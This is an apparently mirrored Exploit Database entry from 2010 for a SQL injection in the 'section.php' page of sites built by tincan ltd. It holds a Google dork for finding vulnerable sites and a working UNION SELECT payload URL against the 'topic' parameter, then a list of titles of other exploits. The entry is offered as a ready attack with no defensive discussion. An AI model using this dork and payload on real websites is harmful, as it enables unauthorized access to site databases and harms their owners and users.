tincan ltd – ‘section’ SQL Injection

Exploit Database
36 阅读

作者： ALTBTA

日期： 2010-01-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11113/

+/=============================================\+
# [+] Title : tincan ltd (section) SQL Injection Vulnerability
# [+] site s.p : www.tincan.co.uk<http://www.tincan.co.uk>
# [+] Author : altbta
# [+] Email : l_9@HoTMaIL.com
# [+] home : v4-team.com<http://v4-team.com> & tryag.cc
+\=============================================/+

===============================================
DorK : intext:'powered by tincan ltd' andinurl:"section.php?section=9"
===============================================
Exploit :
http://server/section.php?section=9&topic=6+union+select+1,2,3,version(),5--
============================================
GreeTz To :
RxH &ab0-3th4b & sniper site

last Exploits
tincan ltd – ‘section’ SQL Injection的更多信息

vTiger CRM 5.1.0 – Local File Inclusion：
Netis E1+ 1.2.32533 – Backdoor Account (root)：
D-Link DSL-2730B Modem – ‘Lancfg2get.cgi Persistent Cross-Site Scripting：
iScripts AutoHoster – ‘tmpid’ Local File Inclusion：
Netsweeper 4.0.8 – Authentication Bypass (via Disabling of IP Quarantine)：
AVE.CMS 2.09 – ‘index.php?module’ Blind SQL Injection：
QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection：
phpCow 2.1 – File Inclusion：